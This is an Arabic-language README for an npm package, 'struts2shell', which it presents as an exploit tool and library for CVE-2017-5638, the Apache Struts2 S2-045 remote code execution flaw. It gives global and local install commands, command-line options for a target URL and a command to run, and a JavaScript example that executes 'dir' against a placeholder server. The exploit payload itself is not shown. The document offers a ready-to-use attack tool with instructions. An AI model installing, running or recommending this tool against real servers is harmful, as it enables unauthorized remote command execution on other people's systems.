
استغلال (ومكتبة) لـ CVE-2017-5638 - ثغرة Apache Struts2 S2-045.
أداة استغلال (ومكتبة) لثغرة CVE-2017-5638 - مشكلة Apache Struts2 S2-045.
$ npm install -g struts2shell
$ npm install struts2shell
-h, --help عرض معلومات الاستخدام
-V, --version عرض رقم الإصدار
-u, --url [target] عنوان URL للهجوم
-c, --cmd [command] الأمر المراد تنفيذه
var Struts2Shell = require('struts2shell');
Struts2Shell({
URL: 'http://example.com/some.action',
CMD: 'dir'
}, function(err, response,body) {
if(err) throw err;
console.log(body)
})

MIT
برنامج مجاني، نعم بكل فخر!